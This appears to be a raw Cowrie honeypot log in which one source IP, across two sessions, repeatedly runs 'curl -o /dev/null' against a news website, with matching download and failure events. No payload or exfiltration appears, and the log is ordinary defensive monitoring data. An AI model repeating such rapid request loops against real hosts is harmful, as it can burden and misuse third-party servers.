{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.809003Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.814558Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.815649Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.840858Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.848803Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.849950Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.852170Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.859445Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.860507Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.875888Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.891429Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.892478Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.894145Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.901546Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.902860Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.928531Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.929910Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.938346Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.939431Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.954693Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.956507Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.961333Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.009875Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.017593Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.028911Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.032958Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.035170Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.036858Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.084640Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.102717Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.103914Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.105511Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.107417Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.109092Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.144373Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.145569Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.149940Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.150924Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.153250Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.156191Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.157862Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.182208Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.183362Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.187371Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.188262Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.192545Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.202136Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.218263Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.219460Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.225000Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.226009Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.233117Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.236615Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.254642Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.255892Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.262078Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.263171Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.283700Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.286804Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.294314Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.295369Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.304402Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.305391Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.311414Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.337575Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.338727Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.340671Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.344854Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.350741Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.351994Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.354597Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.385011Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.386159Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.390944Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.398982Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.400102Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.425797Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.427027Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.441946Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.443146Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.467056Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.468278Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.479351Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.480115Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.495721Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.499319Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.500492Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.509531Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.512266Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.515998Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.516664Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.537482Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.538364Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.550891Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.551736Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.578353Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.579260Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.590072Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.590991Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.604486Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.616260Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.616857Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.632683Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.633482Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.648681Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.655345Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.656298Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.668407Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.669308Z","src_ip":"212.227.125.160","session":"7541ed730449"}
